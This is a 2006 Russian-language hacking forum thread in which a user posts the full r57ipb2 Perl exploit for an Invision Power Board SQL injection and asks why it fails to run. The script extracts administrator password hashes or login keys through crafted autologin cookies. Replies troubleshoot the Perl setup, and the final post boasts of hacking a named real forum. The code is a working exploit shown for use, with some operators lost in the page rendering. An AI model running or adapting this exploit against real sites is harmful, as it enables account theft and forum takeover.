r57ipb2 exploit Help!

Discussion in 'Песочница' started by LancerSpirit, 6 Sep 2006.

Thread Status:
Not open for further replies.
  1. LancerSpirit

    LancerSpirit New Member

    Joined:
    6 Sep 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    При компиляции выдаёт ошибку, кому не в тягость просмотрите пожалуйста и исправте. Начинает ерорить на 36 строке.

    Заранее спасибо. И прошу не нужно оффтопит. Если человек не знает язык это не конец света.

    PHP:
    #!/usr/bin/perl
    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2 
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com  /ipb202/ 1 1
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    use IO::Socket;

    if (@
    ARGV 4) { &usage ;}

    $server    $ARGV[0];
    $path      $ARGV[1];
    $member_id $ARGV[2];
    $target    $ARGV[3];

    $pass = ($target)?('member_login_key'):('password');

    $server =~ s!(http:\/\/)!!;

    $request 'http://';
    $request $server;
    $request $path;

    $s_num 1;
    $|++;
    $n 0;

    print 
    "[~]    SERVER : $server\r\n";
    print 
    "[~]      PATH : $path\r\n";
    print 
    "[~] MEMBER ID : $member_id\r\n";
    print 
    "[~]    TARGET : $target";
    print ((
    $target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print 
    "\r\n";
    print 
    "[~] SEARCHING PASSWORD ... [|]";

    (
    $cmember_id $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

    while(
    1)
    {
    if(&
    found(47,58)==0) { &found(96,122); } 
    $char $i;
    if (
    $char=="0"
     { 
     if(
    length($allchar) > 0){
     print 
    qq{\b\b DONE 
     
     
    MEMBER ID $member_id
     
    };
     print ((
    $target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
     print 
    $allchar."\r\n";
     }
     else
     {
     print 
    "\b\b FAILED ]";
     }
     exit();  
     }
    else 
     {  
      
    $allchar .= chr(42);
     }
    $s_num++;
    }

    sub found($$)
     {
     
    my $fmin $_[0];
     
    my $fmax $_[1];
     if ((
    $fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
     
     
    $r int($fmax - ($fmax-$fmin)/2);
     
    $check " BETWEEN $r AND $fmax";
     if ( &
    check($check) ) { &found($r,$fmax); }
     else { &
    found($fmin,$r); }
     }
     
    sub crack($$)
     {
     
    my $cmin $_[0];
     
    my $cmax $_[1];
     
    $i $cmin;
     while (
    $i<$cmax)
      {
      
    $crcheck "=$i";
      if ( &
    check($crcheck) ) { return $i; }
      
    $i++;
      }
     
    $i 0;
     return 
    $i;
     }
     
    sub check($)
     {
     
    $n++;
     
    status();
     
    $ccheck $_[0];
     
    $pass_hash1 "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
     
    $pass_hash2 "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"
     
    $pass_hash3 $pass.",".$s_num.",1))".$ccheck.") /*";
     
    $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
     
    $nmalykh    "%20";
     
    $socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80");

     
    printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
     
    $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
     
     while(<
    $socket>) 
      { 
      if (/
    Set-Cookiesession_id=0;/) { return 1; }
      } 

     return 
    0;
     }
     
    sub status()
    {
      
    $status $n 5;
      if(
    $status==0){ print "\b\b/]";  }
      if(
    $status==1){ print "\b\b-]";  }
      if(
    $status==2){ print "\b\b\\]"; }
      if(
    $status==3){ print "\b\b|]";  }
    }

    sub usage()
     {
     print 
    q(
     
    Invision Power Board v 2.0.4 SQL injection exploit
     
    ----------------------------------------------------
     
    USAGE:
     ~~~~~~
     
    r57ipb2.pl [server] [/folder/] [member_id] [target]
     
     [
    server]    - host where IPB installed
     
    [/folder/]  - folder where IPB installed
     
    [member_id] - user id for brute
     
     targets
    :
              
    IPB 1.*
              
    IPB 2.* (Prior To 2.0.4)
     
     
    e.gr57ipb2.pl 127.0.0.1 /IPB1 1
     
    ----------------------------------------------------
     (
    c)oded by 1dt.w0lf
     RST
    /GHC http://rst.void.ru , http://ghc.ru
     
    );
     exit();
     }
     
    #1 LancerSpirit, 6 Sep 2006
    Last edited by a moderator: 7 Sep 2006
  2. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    ты брал его на нашем форуме?
    http://forum.antichat.ru/thread15678.html
    тут вроде всё работало... :confused:
     
  3. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    При какой компилляции? Темы про исправление (использоваие) эксплойтов, тем более таких старых обсуждались много раз. Ищи.

    Закрыто.
     
  4. Africanec2

    Africanec2 Banned

    Joined:
    31 Aug 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    $allchar .= chr(42); --->$allchar .= chr($)char);
     
  5. LancerSpirit

    LancerSpirit New Member

    Joined:
    6 Sep 2006
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Выдает

    Can't locate IO/sokcet.pm in @INC <@INC contains: .> at c:\ipb3.pl line 37
     
  6. Africanec2

    Africanec2 Banned

    Joined:
    31 Aug 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    ну ты чо так тупишь возьми \\\\\\....в приват ссылку кину
     
  7. max_pain89

    max_pain89 Eat `em UP!

    Joined:
    11 Dec 2004
    Messages:
    451
    Likes Received:
    140
    Reputations:
    146
    просто, ты неправельно/некорректно/давно установил перл, либо реальная ошибка синтакса.
    у меня это было когда я откатил систему, перл был, но в списках установленных прог не обнаружился... тогда я просто переустановил АктифПерл... помогло
     
  8. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Всем спасибо, за ответы, скорей всего так оно и есть, нужно переустановить.
     
  9. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    на 36 строке камменты заканчиваются))
     
    _________________________
  10. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    если ты компилишь в ехе файл то ниче не получится-- так как фриварный перл to exe не подключает дополнительные модули а у тебя стоит модуль IO-soсket вот бага и вылезает------ запускай из командной строки предварительно установив перл


    --- а что касается того что тебе выдает это значит что у тебя нету модуля io-socket если это выдается просто при запуске --тогда поможет переустановка пердла или закидывание этого файла туда куда просит
     
    #10 genom--, 8 Sep 2006
    Last edited: 8 Sep 2006
  11. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Ну и нервы нужны чтоб на диал-апе 9 метров качать =)
    Таки скачал все пашет =), топик можно закрывать. Всем спасибо за советы.
     
  12. Dizbalans

    Dizbalans New Member

    Joined:
    8 Sep 2006
    Messages:
    5
    Likes Received:
    0
    Reputations:
    -2
    клева я взломал форум вот этот http://www.stroyatom.ru/forum/index.php?showtopic=6 всем удачи)
     
Thread Status:
Not open for further replies.